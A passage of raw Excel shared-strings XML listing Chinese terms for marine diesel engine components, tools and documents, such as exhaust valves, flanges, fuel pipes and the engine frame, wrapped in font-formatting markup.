      <t>发动机接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>入口梯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环氧树脂</t>
    </r>
  </si>
  <si>
    <r>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>新供应商认可</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气凸轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管系</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管系统尺寸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管安装件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气总管展开图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀控制单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>翻转工作台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀翻转机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀阀杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀带阀杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气旁通</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀膨胀节</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器膨胀节进气口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>膨胀水柜</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>千分表接长杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伸出轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接长杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推荐工具（额外供）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬垫拔出工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>百分表接长杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊耳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊环螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊耳螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊环螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊环螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <t>F</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧固支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>塞尺</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带盒厚薄规</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>漏斗</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤网</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空气室灭火设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱灭火设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灭火管路</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>首次生产认可</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铰孔螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装和拆卸工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定带</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阻焰器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管束</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰尺寸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气缸法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轮毂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封环法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>椭圆形法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平面法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对焊法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>椭圆法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方形对焊法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止回阀拆卸法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁钢</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 100*60</t>
    </r>
  </si>
  <si>
    <r>
      <t>FLEX</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电控部件</t>
    </r>
  </si>
  <si>
    <r>
      <t>FLEX</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统说明</t>
    </r>
  </si>
  <si>
    <r>
      <t>FLEX</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部系统说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>浮子</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>浮子控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>浮动开关壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流动控制器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量探测器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>限流阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流体流速表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带槽密封圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮护盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮轮廓图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>踏板</t>
    </r>
  </si>
  <si>
    <r>
      <t>U</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叉形端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拨叉杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体形位公差</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架形位公差</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>成形板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架仰视图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架剖视图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架凸轮轴侧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架俯视图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水冷却管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水冷却系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水出口管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水系统预热</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水系统处理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摩擦材料</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摩擦垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前卡套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>首次生产批准程序：材料规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>首次生产认可</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>_</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油和排气机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油与排气机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油凸轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油进油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泄放监测</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泄漏回油管</t>
    </r>
  </si>
  <si>
    <r>
      <t>ICU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泄漏油回油总管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>共轨单元燃油泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油过滤器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵进油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油出口管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管绝缘层</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油处理曲线图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油回油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
